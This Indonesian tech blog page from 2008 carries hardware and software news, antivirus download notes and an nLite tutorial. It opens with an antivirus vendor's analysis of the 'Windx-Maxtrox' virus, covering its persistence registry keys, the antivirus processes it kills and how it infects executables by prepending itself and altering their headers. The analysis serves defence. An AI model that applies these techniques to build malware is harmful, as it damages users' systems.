Untuk itulah, PC Media mengeluarkan PCMAV 1.6 Update Build3 yang telah dilengkapi engine cleaner khusus untuk mengatasi virus Windx-Matrox secara tuntas sampai ke “akar-akarnya” serta mampu memulihkan file yang terinfeksi, walau dienkrip, hingga kembali utuh 100%! Jangan ambil risiko, gunakan hanya PCMAV 1.6 Build3 untuk mengatasi virus ini secara tuntas. Di PCMAV 1.7 nanti engine cleaner khusus ini juga telah tersedia. Selain itu, artikel ini juga dilengkapi hasil analisa lengkap virus Windx-Maxtrox untuk meluruskan beberapa kekeliruan dari analisa virus ini yang sempat beredar di media massa, baik cetak maupun online. Selamat mengikuti…

Update Build3 hadir dengan penambahan 15 pengenal varian virus baru. Bagi Anda pengguna PCMAV 1.6 sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi. Jadi, total virus yang dapat dikenali hingga Build3 kali ini adalah sebanyak 38 virus.

Untuk mendapatkan dan menggunakan update PCMAV ini, pastikan terlebih dahulu PCMAV RealTime Protector tidak sedang aktif. Jika iya, Anda harus menutup aplikasi tersebut terlebih dahulu. Lalu Anda cukup menjalankan PCMAV Cleaner (PCMAV-CLN.exe), tentunya komputer harus dalam keadaan aktif terhubung ke Internet (non-proxy). Fitur GetUpdates dari PCMAV secara otomatis akan memberikan alamat internet yang aktif di mana Anda bisa men-download file update tersebut. Letakkan file hasil download tersebut (PCMAV.vdb) ke dalam folder di mana PCMAV berada. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.

Namun bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa alamat ini: SendSpace.com, Badongo.com (mirror), atau UploadMB.com (mirror).

Tampilan wallpaper desktop setelah diubah oleh virus Windx-Maxtrox.
Virus Windx-Maxtrox:

  • Maxtrox yang dimaksudkan oleh pembuat virus ini adalah Maximum Troxer. String tersebut tertera pada tubuh virus.
  • Project virus ini menggunakan form yang ia namakan MSystem, dalam form tersebut terdapat beberapa komponen seperti PictureBox, Label, dan lainnya. Selain form, tentunya terdapat juga module di dalamnya. Ia di-compile dengan metode P-code.
  • Virus lokal ini diduga kuat berasal dari daerah Sulawesi Utara seperti varian sebelumnya. Apalagi ini didukung dengan terdapatnya string pengenal pada tubuhnya yakni “UNKLAB” yang diduga menunjuk salah satu perguruan tinggi di sana.
  • Virus ini tidak menggunakan icon, tapi dia memiliki kemampuan untuk mendapatkan icon dari program yang diinfeksinya.
  • Pada saat menginfeksi, virus ini akan menanamkan file induknya pada folder \Windows\System32 dengan nama CommandPrompt.Sysm, Desktop.sysm dan Windows 3D.scr. Dengan sebelumnya, ia telah membuat atau me-register extension baru yakni .MSD dan .SYSM yang akan berjalan sebagai mana layaknya file .EXE.
  • Ia juga menciptakan file induk untuk dijalankan agar aktif di memory, yang disimpannya pada “C:\Documents and Settings\%username%\Application Data\Microsoft” atau “C:\Documents and Settings\%username%\My Network Places\Network Connections\“, dengan menggunakan nama berbeda-beda, yang diambil dari kombinasi string berikut: ux, vc, sc, ds, cs, iz, am, d, n, a, w, h, n, .exe, g.exe, w.exe, a.exe, v.exe, p.exe, t.exe.
  • Untuk dapat aktif otomatis, ia menciptakan registry di “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\” dengan nama VisualStyle.
  • Dia menggunakan teknik enkripsi untuk melindungi string-string di dalamnya. Teknik enkripsi yang digunakan yakni Caesar Cipher, dengan menambahkan atau maju satu karakter.
  • Dia menciptakan sebuah file maxtrox.txt pada direktori System32 yang hanya berisi string “UNKLAB”.
  • Jika ketentuan ini memenuhi syarat “if (Month(Now) Mod 4) = 0) and (Day(Now) <>

- Mengubah wallpaper desktop menjadi gambar Battosai, di bagian atas terdapat tanggal hari itu, dan di bagian bawah terdapat tulisan “Hello %username%! If you have seen me, you are same as a fool guy!”. %username% merupakan username yang sedang aktif saat itu.

- Memeriksa komputer tersebut, jika user menjalankan Antivirus, maka akan ia terminate, dan tulisan di wallpaper berubah menjadi Antivirus detected! Sorry, now it isn’t running anymore!“. Atau jika user menjalankan PCMAV, akan ada tulisan seperti ini “you try to kill me with PCMAV? Try with your ultime version!”. Virus ini memang diketahui memiliki database yang menyimpan string-string beberapa produk antivirus, dan string tersebut juga dalam keadaan ter-enkripsi. Antara lain: mcafee, norton, virusscan, pcmav, spyware, norman, caspersky, chaspersky, symantec, antivirus, scanvirus, esafe, avast, inoculan, f-secure, virus utilities, iris anti, kaspersky, dr. Solomon, netshield, groupshield, thunderbyte, panda antivirus, global virus, vi-spy, sophos anti, interscan, viruswall, webprotect, officescan, scanmail, serverprotect, pc-cillin.

- Mengubah wallpaper folder System32, yakni dengan menggunakan gambar yang sama, seperti yang ia ubah untuk wallpaper desktop, dengan tulisan “It’s a pleasure to meet you, %username%. Oh, nice vacation place.”. Dan di sudut pojok kanan terdapat tulisan, “Maximum Troxer”.

- Virus ini juga menulis registry untuk autorun pada safe-mode, di:

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\AlterneShell
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\AlterneShell
HKLM\SYSTEM\ControlSet002\Control\SafeBoot\AlterneShell

- Ia juga melakukan pemeriksaan secara terus menerus, apabila ditemukan window dengan caption “Windows Task Manager” juga akan ia terminate.

Header executable sebelum dan sesudah di-enkripsi oleh Maxtrox.

Infeksi file .EXE:
Virus ini akan mencoba menginfeksi file-file executable yang ada pada folder Program Files dengan menginfeksikannya secara cerdik:

  • Saat menginfeksi, ia akan terlebih dahulu memastikan apakah file target adalah merupakan file executable, caranya dengan membaca 2 byte pertama dari file target. File executable yang valid, pada 2 byte pertama adalah “MZ” (4D5Ah).
  • Selanjutnya ia akan membaca seluruh tubuh dari file target untuk memeriksa signature nya sendiri, “0xA0 0xA0 0xA0 0×00 0xA0 0×00 0xA0 0xA0 0xA0″ (hexa), untuk memastikan apakah file tersebut telah terinfeksi atau belum.
  • Lalu ia akan mempersipakan buffer baru untuk menginjeksi virus ke dalam file target. Pada buffer tersebut, ia akan meletakan tubuhnya di awal, dan cerdiknya ia juga mengambil bagian resource yang terdiri dari icon dan version information dari file target. Jadi file terinfeksi pun akan memiliki icon dan version information yang sama dengan file aslinya. Jadi, urutan bagan file tersebut menjadi: file virus, resource file target, signature virus, isi file target.
  • Di bagian isi file target pun tidak ia tempelkan begitu saja, karena bagian header-nya juga telah ia ubah sebelumnya, yakni meng-overwrite 2 byte pertama dari 0×4D5A menjadi 0xA0A0. Dan mulai dari offset 0×2 hingga 0×97, ia enkripsi setiap byte-nya menggunakan Caesar Cipher dengan penambahan 2.
  • Saat file terinfeksi dijalankan, ia terlebih dahulu akan meng-extract file yang diinfeksikannya dari dalam tubuhnya pada direktori yang sama, nama file nya sedikit dibedakan dengan nama file aslinya, karena antara nama file dan extension bukan dipisah oleh titik namun spasi, misalkan dari “wmplayer.exe” menjadi “wmplayer exe”. Lalu, file hasil extract nya tersebut yang akan dijalankan.

PERHATIAN PENTING! Karena virus ini dikenal dapat mematikan antivirus, termasuk PCMAV 1.6, setelah diupdate dengan Build3 silakan Anda rename (ubah nama) terlebih dahulu file PCMAV-CLN.EXE sebelum dijalankan, misalkan menjadi 123456.EXE atau nama lain berekstensi .EXE.

Read More | Goto Top

26 Agustus 2008

Gempa Ujung Kulon, Jakarta Juga Bergetar
Share 0 komentar

Selasa, 26 Agustus 2008 | 11:05 WIB JAKARTA, SELASA - Gempa yang menggoyang Ujung Kulon dirasakan pula warga Jakarta. Gempa yang terjadi pukul 10.07 ini sempat memunculkan peringatan tsunami dari BMG.

Di kawasan di gedung perkantoran bertingkat tinggi di kawasan Thamrin, Jakarta, dan sekitarnya, guncangan gempa tersebut bisa dirasakan hingga membuat sejumlah karyawan sedikit panik dan berupaya turun ke lantai bawah melalui tangga darurat dan lift.

"Saya sedang membaca laporan, tiba-tiba kepala terasa pening dan benda di sekitar bergoyang. Tadinya saya pikir kepala saya memang pening ternyata teman-teman lain berteriak ada gempa," kata Indri, karyawan yang bekerja di salah satu perusahaan di gedung Wisma ANTARA lantai 20.

Sementara itu, di lantai dasar gedung tampak sejumlah orang berkerumun dan bergegas keluar dari gedung.

Pusat gempa berkekuatan 6,6 pada Skala Richter berada di Ujung Kulon tepatnya 6.46 LS - 104.41 BT dengan kedalaman 20 km.

Read More | Goto Top

Gempa Kecil di Ujung Kulon
Share 0 komentar

SERANG, SELASA- Meskipun Badan Meteorologi telah mengumumkan peluang terjadinya tsunami menyusul gempa berkekuatan 6,6 skala Richter di lepas pantai Ujung Kulon, Pandeglang, Banten, masyarakat di Ujung Kulon saat ini masih melakukan aktifitas seperti biasa.

"Gempanya tidak besar, hanya lini kecil," kata Warsa, warga Desa Taman Jaya, Kecamatan Sumur, Pandeglang, yang dihubungi Kompas dari Serang, Selasa pagi ini. Lini adalah sebutan untuk gempa bagi masyarakat Ujung Kulon.

Busro, warga Desa Cigorondong, Kecamatan Sumur, Pandeglang menyatakan, gempa kecil itu hanya dirasakan masyarakat Ujung Kulon sekitar 30 detik. Sejauh ini juga tidak diperoleh laporan mengenai kerusakan akibat gempa yang terjadi lewat pukul 10.00 tadi.

Dikatakan Busro, masyarakat Ujung Kulon saat ini bahkan masih beraktifitas seperti biasa meski ada peringatan dini dari BMG tentang potensi tsunami. Saat ini, Busro bahkan sedang berkumpul bersama aparat desa dan Babinsa setempat di dekat pos keamanan dekat pantai Ujung Kulon.

Sejauh ini aktifitas warga juga tidak terganggu. Anak-anak sekolah tidak dipulagkan, nelayan tetap melaut, sedangkan petani tetap bekerja di ladangnya.

Dari Badan Meteorologi setempat diperoleh informasi, pusat gempa berada 125 km barat laut Ujung Kulon dengan kedalaman 20 km. Lokasi tepatnya di 6,46 Lintang Selatan dan 104,41 Buur Timur. Gempa terjadi pukul 10.07, dan diperkirakan berpotensi menimbulkan tsunami.

Read More | Goto Top

Share 0 komentar

SERANG, SELASA- Meskipun Badan Meteorologi telah mengumumkan peluang terjadinya tsunami menyusul gempa berkekuatan 6,6 skala Richter di lepas pantai Ujung Kulon, Pandeglang, Banten, masyarakat di Ujung Kulon saat ini masih melakukan aktifitas seperti biasa.

"Gempanya tidak besar, hanya lini kecil," kata Warsa, warga Desa Taman Jaya, Kecamatan Sumur, Pandeglang, yang dihubungi Kompas dari Serang, Selasa pagi ini. Lini adalah sebutan untuk gempa bagi masyarakat Ujung Kulon.

Busro, warga Desa Cigorondong, Kecamatan Sumur, Pandeglang menyatakan, gempa kecil itu hanya dirasakan masyarakat Ujung Kulon sekitar 30 detik. Sejauh ini juga tidak diperoleh laporan mengenai kerusakan akibat gempa yang terjadi lewat pukul 10.00 tadi.

Dikatakan Busro, masyarakat Ujung Kulon saat ini bahkan masih beraktifitas seperti biasa meski ada peringatan dini dari BMG tentang potensi tsunami. Saat ini, Busro bahkan sedang berkumpul bersama aparat desa dan Babinsa setempat di dekat pos keamanan dekat pantai Ujung Kulon.

Sejauh ini aktifitas warga juga tidak terganggu. Anak-anak sekolah tidak dipulagkan, nelayan tetap melaut, sedangkan petani tetap bekerja di ladangnya.

Dari Badan Meteorologi setempat diperoleh informasi, pusat gempa berada 125 km barat laut Ujung Kulon dengan kedalaman 20 km. Lokasi tepatnya di 6,46 Lintang Selatan dan 104,41 Buur Timur. Gempa terjadi pukul 10.07, dan diperkirakan berpotensi menimbulkan tsunami.

Read More | Goto Top

Download PC Media Antivirus (PCMAV) 1.6 + Update Build 2 + ClamAV
Share 0 komentar

pcmavUpdate kedua yang lazim disebut dengan Update Build2 ini membawa tambahan 11 virus signature baru. Update dalam file PCMAV.VDB yang memiliki filesize sebesar 84 kilobytes. jadi total UB adalah 23 virus.
Para pengguna PCMAV tentunya disarankan untuk mengupdate program PCMAV 1.6 dengan update yang terbaru ini untuk memperoleh perlindungan maksimal dari ancaman virus.

Bagi yang belum pernah donload pcmav 1.6 bisa donlod full versinya disini:

Download PCMAV-1.6 + Update Build2.rar (WINRAR)

Bagi yang sudah pernah donload pcmav 1.6 bisa donload UpdateBuild2nya saja. File berupa zip / rar. Silahkan diekstrak ke folder dimana PCMAV 1.6 RTP & CLN Berada.

Download UpdateBuild2 (.vdb).rar (WINRAR) 79.17 KB atau (Server Mirror UB2VDB.RAR)

Download UpdateBuild2 (.vdb).zip (WINZIP) 79.12 KB atau (Server Mirror UB2VDB.ZIP)

Gabungkan PCMAV dengan CLAMAV!

Bagi yang ingin mengintegrasikan atau menggabungkan dengan engine CLAMAV dengan menggunakan library CLAMAV versi 0.9x, maka jumlah virus yang dikenali menjadi lebih banyak yaitu (401469 + 2064 + 23 viruses mampu terbaca. Yang kamu butuhkan adalah dengan menggabungkan file-file dibawah ini ke dalam satu folder dengan PCMAV 1.6 RTP & CLN. Silahkan diekstrak ke folder dimana PCMAV 1.6 RTP & CLN Berada.

Download database CVD terbaru yaitu file main.cvd dan daily.cvd dari website ClamAV:

1. Download main.cvd ver. 47 released on 23 Jun 2008 18:20 +0000 size: 14,5 MB (klik kanan terus save as)
2. Download daily.cvd ver. 8073 released on 22 Aug 2008 12:48 +0000 size: 1,3 MB -> yang ini up to date (klik kanan trus save as)

Download file library ClamAV 0.93.3 dan library MSVCRT80:

3. Download ClamAV & MSVCR80.rar (WINRAR) 771.48 KB atau (SERVER MIRROR CLAMAV.RAR )

3. Download ClamAV & MSVCR80.zip (WINZIP) 963.69 KB atau (SERVER MIRRO CLAMAV.ZIP)

Gabungkan ketiganya ke dalam folder PCMAV 1.6 berada.

Bagi yang belum pernah download PCMAV terbaru bisa langsung download Versi lengkap PCMAV 1.6 UB2 & CLAMAV 0.93.3 (belum termasuk main.cvd & daily.cvd) yang bisa didownload disini:

Download PCMAV 1.6 UB2+CLAMAV.rar (WINRAR) 2.67 MB atau (Server Mirror PCMAV1.6UB2+CLAMAV.RAR)

Download PCMAV 1.6 UB2+CLAMAV.zip (WINZIP) 3.33 MB atau (Server Mirror PCMAV1.6UB2+CLAMAV.ZIP)

Daftar total tambahan virus PCMAV 1.6 Update Build2:
Aikom, Aikom.txt, Autoit.BL, Autoit.BM, Autoit.BO, BlackHole, BlackHole.exe.A, BlackHole.exe.B, BlackHole.inf, BlackHole.txt.A, BlackHole.txt.B, BlackHole.txt.C, Gutbai, HelloBaby, HelloBaby.exe, HelloBaby.inf, Naruto.vbs, Naruto.vbs.inf, Plaige, SlowButSure.vbs.E, VirGear.B, VirGear.C, Zifoe.B

Read More | Goto Top

21 Agustus 2008

Intel Umumkan CPU Core i7
Share 0 komentar

Logo Core i7Intel telah mengumumkan nama merk yang akan dipakai untuk memasarkan produk Nehalem pada hari Minggu tanggal 10 Agustus 2008. Intel akan menamakan semua prosesor berbasis Intel Nehalem, termasuk Extreme Edition "Intel Core i7," bukan "Core 3" seperti yang banyak dispekulasikan sebelumnya. Intel belum mengkonfirmasikan klasifikasi Nehalem secara mendetil, akan tetapi mereka mengatakan bahwa clockspeed yang berbeda akan memiliki nomor model yang berbeda seperti biasa.

Intel memutuskan untuk mempertahankan merk "Core" karena nilai-nilai positif yang diasosiasikan dengan seri produk tersebut. Sean Maloney, korporat EVP dan GM Intel mengatakan bahwa "nama Core adalah merk PC andalan kita dan akan tetap menjadi merk PC andalan di masa depan. Mulai sekarang, Intel akan menginvestasikan bahkan lebih banyak lagi biaya pemasaran untuk merk Core dan Core i7."

Merk i7 tidak memiliki hubungan langsung dengan sejarah pengembangan CPU Intel sebelumnya. Netburst (Pentium 4) adalah arsitektur generasi tujuh Intel. Menurut Intel sendiri, mereka memilih "i7" hanya karena nama ini "pendek dan enak didengar."

Core i7 akan tersedia secara massal mulai kuartal empat tahun ini.

Read More | Goto Top

IE8 Keluar Akhir Tahun 2008
Share 0 komentar

Logo IE8Blogger Microsoft Mary Jo Foley memberitakan kabar terbaru tentang jadwal rilis Internet Explorer 8 (IE8). Microsoft sejauh ini sangat merahasiakan jadwal peluncuran IE8, tetapi kini kita tahu bahwa browser terpopuler dunia ini akan dirilis tahun ini.

Di Financial Analyst Meeting (FAM) Microsoft senior VP Online Services dan Windows Bill Veghte mengatakan kepada hadirin bahwa Microsoft akan merilis versi final IE8 untuk publik tahun ini.

IE8 Beta 1 yang ditujukan kepada para pengembang web dirilis di bulan Maret, Microsoft juga memperingatkan kepada para pemilik situs harus memperbaharui situs mereka atau menanggung resiko berpenampilan 'berbeda' saat dibuka di IE8.

Di awal bulan ini Microsoft juga mengumumkan bahwa IE8 Beta 2 yang ditujukan ke pengguna internet akan diluncurkan di bulan Agustus, lengkap dengan beberapa fitur sekuriti baru.

Masih belum jelas apakah Microsoft akan mengeluarkan versi Beta 3 sebelum versi final, tetapi mengingat waktu yang dimiliki sangat singkat (hanya memiliki 4 bulan) untuk memperbaiki semua bug yang dilaporkan di Beta 2, kemungkinan besar tidak.

Read More | Goto Top

USB 3.0 xHCI Siap Terjun ke Pasar
Share 0 komentar

USB 3.0 yang super cepat (4.8Gbps) melakukan satu lagi langkah besar mendekati para pengguna komputer dan hard disk (HD). Hari ini Intel mengumumkan versi final untuk xHCI open USB 3.0 host controller standard yang kemungkinan besar akan diadopsi oleh mayoritas motherboard dan pembuat chipset.

Penggunaan protokol seperti USB bisa menimbulkan masalah kompatibilitas apabila masing-masing vendor mengimplementasikan protokol USB dengan cara yang berbeda, mirip seperti apa yang terjadi dengan Firewire beberapa tahun lalu. Untuk itu, para vendor tersebut berencana untuk mendesain satu saja spesifikasi terpercaya untuk dipakai di seluruh dunia dengan lisensi bebas royalti - dan Intel secara sukarela menawarkan untuk mengembangkan spesifikasi ini sejak awal diperkenalkannya USB.

Kehadiran Intel membawa angin segar bagi para vendor di atas. Dengan Intel yang merilis standar ini untuk semua orang, masing-masing vendor tidak perlu mendesain protokol mereka sendiri sekaligus menjamin kompatibilitas dengan semua alat.

Dengan rampungnya standar WHCI USB (versi 1.0), hampir semua vendor dengan senang hati mengadopsi standar EHCI USB (versi 2.0) yang menjadi penerus WHCI, dan inilah yang menyebabkan adanya port USB di hampir semua komputer hari ini. Microsoft sendiri juga mendesain driver pengontrol USB untuk Windows berdasarkan WHCI, dan driver USB 2.0 dengan EHCI. Tampaknya, xHCI (Extensible Host Controller Interface) juga akan dengan cepat menjadi standar de facto bagi USB 3.0.

Satu bukti lagi tentang dukungan untuk standar xHCI milik Intel adalah ketersediaan vendor-vendor besar seperti AMD, Microsoft, NEC, dan Dell untuk menggunakan xHCI. Microsoft telah mengumumkan akan menggunakan xHCI sebagai basis dari driver USB 3.0 Windows. AMD telah mengumumkan penggunaan xHCI untuk chipset motherboard. Dan terakhir, NEC juga telah melakukan uji coba kesesuaian alat-alat elektroniknya yang memiliki port USB 3.0 nya dengan xHCI.

Dengan spesifikasi yang sudah jelas, para vendor besar tampaknya sedang berusaha keras menciptakan produk yang kompatibel dengan standar baru tersebut. Tinggal hitungan bulan saja, sampai berbagai alat dengan USB 3.0 bermunculan di pasar.

Read More | Goto Top

Microsoft Office 14 Keluar 2009
Share 0 komentar

Logo Microsoft OfficeProgram beta untuk Microsoft Office 14 (kemungkinan akan diganti namanya menjadi Microsoft Office 2009) mungkin belum dimulai, akan tetapi blog Microsoft Dynamics CRM menyinggung tentang jadwal peluncuran Office 14 pada akhir tahun depan atau awal tahun 2010.
Dalam blog tersebut, Microsoft mengatakan bahwa "Dokumen ini memperlihatkan arah pengembangan Microsoft Dynamics CRM menuju versi besar selanjutnya, Microsoft Dynamics CRM 'V.Next" yang akan dikeluarkan bersama dengan peluncuran produk-produk Office 14 di akhir tahun 2009/awal 2010."

Bocoran Office 14


Ada kemungkinan Microsoft akan mencabut informasi ini dari situsnya. Periode ini tentunya sangat dekat dengan tanggal peluncuran Windows 7, dan tampaknya produsen perangkat lunak terbesar dunia ini ingin mengulangi cara peluncuran Vista/Office 2007 yang bersamaan, kali ini untuk Windows 7 dan Office 14.

Sejauh ini Microsoft masih belum memberikan banyak penjelasan tentang fitur baru Office 14 yang sudah mulai dikembangkan di tahun 2006. Office 14 diduga tetap akan menggunakan tampilan "ribbon" yang juga akan ditambahkan untuk Microsoft Visio dan Project. Microsoft Office 14 juga diduga akan menggunakan format Open XML yang telah menjadi standar ISO. (ArsTechnica)

Read More | Goto Top

Western Digital Siapkan Harddisk 20.000 RPM
Share 0 komentar

Western Digital Raptor berkecepatan 20.000 RPMMenurut beberapa sumber di industri hard disk (HD), Western Digital tengah mempersiapkan HD Raptor baru dengan kecepatan rotasi 20.000 RPM untuk bersaing dengan SSD.
Sebagian besar analis industri komputer memiliki konsensus yang sama yaitu SSD akan mulai memasuki segmen mainstream dalam 12 hingga 18 bulan ke depan. Bahkan hari ini, notebook segmen tinggi yang menggunakan SSD untuk meningkatkan kinerja dan laptop berukuran kecil sudah mulai menjamur. Para produsen HD mulai khawatir bahwa SSD akan sedikit demi sedikit menggerogoti pangsa pasarnya, terutama di mana kinerja lebih penting dibandingkan kapasitas penyimpanan.

Seri produk Raptor dari Western Digital dibuat untuk ini. HD baru ini sangaat mirip dengan VelociRaptor yang baru-baru ini dirilis, memiliki ukuran 2,5 inci, tetapi dimuat dalam housing 3,5 inci kustom. Saat ini produk ini masih berada dalam tahap pengembangan dan masih belum banyak detil yang tersedia, termasuk tanggal rilisnya.

Akan tetapi, sumber-sumber Bit-Tech mengatakan bahwa HD ini akan sangat sunyi — walaupun HD ini akan berkinerja dengan kecepatan 20.000 RPM. Western Digital melakukan hal ini dengan memperbaharui desain housing yang tidak hanya berfungsi sebagai pendingin, tetapi juga sebagai peredam suara.

Read More | Goto Top

Motherboard Baru Intel Dilengkapi Remote Wake
Share 0 komentar

Intel mengatakan bahwa mereka telah mengembangkan motherboard baru yang memungkinkan PC untuk tetap mempertahankan fungsionalitasnnya walaupun pada saat mereka sedang berada pada sleep mode yang memungkinkan penhematan energi hingga 20%.

Motherboard baru seri DG45FC dan DG45ID direncanakan mulai dijual bulan depan dan kelak akan dinamakan remote wake technology. Fitur ini bukanlah sesuatu yang baru, sebelumnya telah hadir pada platform Intel vPro, dengan sedikit perbedaan yaitu pada bagian yang memungkinkan administrator sistem untuk menjalankan repair atau update PC secara remote.

Untuk PC level konsumen, remote wake akan memungkinkan PC untuk secara otomatis hidup untuk menjalankan beberapa tugas, seperti menjawab telepon dan mengunduh media. Beberapa perusahaan yang mendukung hardware dari Intel ini adalah provider VOIP, Jajah; Cyberlink, Orb dan Pando Networks.

Intel mengatakan bahwa teknologi ini akan dihadirkan dalam empat motherboard untuk desktop. Hingga saat ini, fitur hanya tersedia untuk koneksi Ethernet, yang berarti jika Anda ingin menggunakan remote untuk menyalakan komputer, pengguna Wi-Fi harus menghubungkan PC mereka kepada Wi-Fi router dengan kabel Ethernet.

Pesan yang ingin disampainkan dengan adanya teknologi ini sangat jelas, yaitu ramah lingkungan lingkungan. Contohnya, jika Anda sedang tidak menggunakan komputer Anda dan satu-satunya tugas yang dilakukan komputer Anda adalah menunggu telepon, konsumsi daya minimum yang diperlukan biasanya adalah sekitar 60 watt sedangkan PC dalam sleep mode yang hidup secara otomatis saat masuknya telepon hanya mengkonsumsi daya sebesar 10 watt.

Read More | Goto Top

Panduan Membuat CD Instalasi Windows XP Kustom
Share 0 komentar

Tutorial ini akan memandu Anda dalam membuat sebuah CD instalasi Windows yang dapat diinstal secara otomatis lengkap dengan semua hotfix, driver, DirectX, IE7, Media Player 11, Office 2007 atau aplikasi apapun yang ingin Anda tambahkan ke dalam CD tersebut. Anda juga dapat menghilangkan komponen-komponen tak berguna, mengemas beberapa tweak ke CD instalasi ini untuk mendapatkan XP dengan berkinerja tinggi. Untuk membuat CD instalasi ini Anda membutuhkan nLite, .Net Framework 2.0 dan CD WinXP.

Instruksi

1. Copy semua konten CD WinXP ke folder lokal.

2. Instal .Net Framework 2.0 dan nLite.


3. Pilih bahasa pilihan Anda pada halaman pertama
welcome to nLite

4. Beritahu nLite di mana file WinXP Anda. Pilih “Browse” dan navigasikan ke folder lokal yang Anda ciptakan pada langkah pertama
browse

5. Anda dapat memilih hanya satu operasi, kombinasi atau semua operasi. Sebagai contoh, Anda dapat memilih untuk menciptakan sebuah ISO dan tidak menghiraukan sisanya:
operation

6. Service Pack: cukup unduh SP2 untuk WinXP dan nLite akan melakukan sisanya. Jika Anda mengintegrasikan SP2 (atau bahkan SP3), Anda tidak membutuhkan SP1 karena SP2 akan menggantikannya.
service pack

7. Hotfixes, Addons and Update Packs: Tambahkan hotfix atau update packs pada instalasi Anda.
addons

* Anda dapat mendapatkan hotfix XP dengan menggunakan RyanVM Post SP2 Update Pack atau Windows Updates Downloader.

* Windows Media Player 11: Unduh WMP11 Integrator dan WMP11 installer. Gunakan WMP 11 Integrator untuk menanamkan WMP11 pada WinXP CD sebelum melakukan perubahan apapun pada nLite.

* Internet Explorer 7.0: cukup unduh IE7 dan tambahkan file .exe ke nLite.

* Addons: Unduh lebih dari 350 addons untuk nLite dari WinAddons.

Video Tutorial : Slipstream Windows Media Player 11

Video tutorial: Slipstream Internet Explorer 7 with nLite

Video tutorial: Integrate addons with nLite

8. Drivers: Integrasikan driver ke dalam CD instalasi XP. Cari file .inf dan nLite akan mengerjakan sisanya. Berkat http://driverpacks.net/ Anda dapat membuat CD instalasi untuk hampir semua perangkat keras.
drivers

Video tutorial: Cara mengintegrasikan driver ke dalam CD instalasi XP.

9. Komponen-komponen: Pilih komponen yang ingin Anda hapus dari instalasi. Pastikan Anda telah membaca informasi singkat sebelum menghapus sebuah komponen khususnya yang berwarna merah.
components

Dengan memilih Advanced, Anda akan diberikan kesempatan untuk menyimpan beberapa file spesifik. Sebagai contoh, Anda dapat menyingkirkan “Command Line Tools”, namun Anda dapat menyimpan ping.exe, ipconfig.exe, dll.
command line tools

Apabila Anda sudah cukup berpengalaman, Anda juga dapat mengabaikan Compatibility Wizard:
unnatended

10. Unattended: Tentukan konfigurasi di muka, sehingga Anda tidak perlu mengetikkan nama pemakai, CD-Key, Regional Setting dan lainnya. Anda juga dapat menambahkan tema Windows:
Photobucket

Video tutorial: Unattended installation CD with nLite

Video tutorial: Integrate themes with nLite

11. Options: Anda dapat mengabaikan General tab dan langsung ke Patches:
  • Koneksi berkesinambunga maksimum (TCP/IP patch): Set 100 atau 1000 untuk performa P2P maksimal.
  • USB Port Polling Frequency (Hz): Berikan frekuensi yang lebih besar untuk memperhalus gerak tetikus USB. Tidak untuk tetikus nirkabel dan gunakan secara hati-hati! Bekerja baik pada Logitech MX, MS IntelliMouse Explorer 3, Razer Viper dan mungkin yang lainnya.
  • Unsigned Themes Support (Uxtheme Patch): Set untuk memungkinkan Anda menggunakan tema pihak ke-tiga.
  • SFC (Windows File Protection): Set untuk mematikan automatic recovery dari file dan folder system yang dihapus.
Video tutorial: Patch Windows with nLite

12. Tweaks: Sudah cukup jelas dari namanya. Aplikasikan registry tweak favorit Anda dan atur berbagai Windows Services.
tweaks

Anda juga dapat mengubah konfigurasi berbagai aplikasi Windows yang dijalankan sebagai service. Gunakan Windows Services Guide untuk membantu Anda.
service guide

13. Bootable ISO: Jika sudah siap, Anda dapat membuat CD ISO atau melakukan tes pada mesin virtual. Anda dapat membuat ISO dengan nLite atau CD/DVD burner favorit Anda seperti Nero.
bootbale ISO

Video tutorial: Create a Bootable CD with nLite

Video tutorial: Burn ISO files with Nero

Video tutorial: Test ISO in VMware Machine 5.5 � shareware

Video tutorial: Test ISO in Virtual PC 2004 � freeware

Video tutorial: Test ISO in VirtualBox 1.5 � freeware

Read More | Goto Top

AMD Umumkan 4 Phenom Kelas Bisnis Baru
Share 0 komentar

Sunnyvale (CA) – beberapa hari lalu, AMD mengumumkan adanya 4 prosesor Phenom baru untuk kalangan bisnis. Yang artinya adalah prosesor-prosesor baru dijamin tidak akan ketinggalan zaman untuk setidaknya 2 tahun ke depan dengan garansi selama 3 tahun.



Empat prosesor Phenom baru tersebut adalah peningkatan dari seri B milik AMD, yang di dalamnya termasuk motherboard dengan chip 780V milik AMD atau MCP78 milik Nvidia. Keempat model baru tersebut memiliki spesifikasi sebagai berikut:
  • Phenom X4 9750B (2.4GHz/95 watt)
  • Phenom X3 8750B (2.4 GHz/95 watt)
  • Athlon X2 5600B (2.9GHz/65 watt)
  • Athlon X2 4850B (2.5 GHz/45 watt)
Harganya pun telah diumumkan. Dengan strategi kelas bisnis, harganya diperkirakan lebih mahal sekitar 20% untuk segmen atas dan 10% untuk yang lebih rendah jika dibandingkan dengan yang bukan seri B untuk tipe yang sama.

Hal menarik yang perlu dicatat adalah AMD telah mengubah strategi pemberian nama untuk prosesor Phenomnya, yang sekarang telah konsisten dengan keluarga besar produk Phenom lainnya. Padahal, generasi pertama dari Phenom seri B menggunakan tipe yang berbeda. Tadinya, AMD ingin menggunakan angka "XX50" untuk Phenom generasi ketiga TLB Bug-Free.

Read More | Goto Top

Microsoft Luncurkan Blog Windows 7
Share 0 komentar

Windows 7Sejauh ini Microsoft masih belum banyak bicara tentang Windows 7. Hampir semua yang kita ketahui tentang operating system (OS) penerus Vista ini dibocorkan Microsoft secara perlahan hanya kepada institusi-institusi tertentu, dan itupun hanya sedikit. Bahkan beberapa mitra Microsoft mengeluh bahwa Microsoft tidak cukup terbuka dan mereka benar-benar membutuhkan detil Windows 7 untuk merencanakan produk mereka.

Kerahasiaan ini tampaknya berubah sedikit demi sedikit: Microsoft telah meluncurkan blog bernama "Engineering Windows 7" (E7) di http://blogs.msdn.com/e7/.

Anggota-anggota lain dari tim Windows 7 akan turut berpartisipasi dan berdiskusi di E7 yang memiliki dua penulis utama:
  • Steven Sinofsky — bertanggung jawab atas Windows dan Windows Live Engineering Group
  • Jon DeVaan — pemimpin divisi Windows Core Operating System
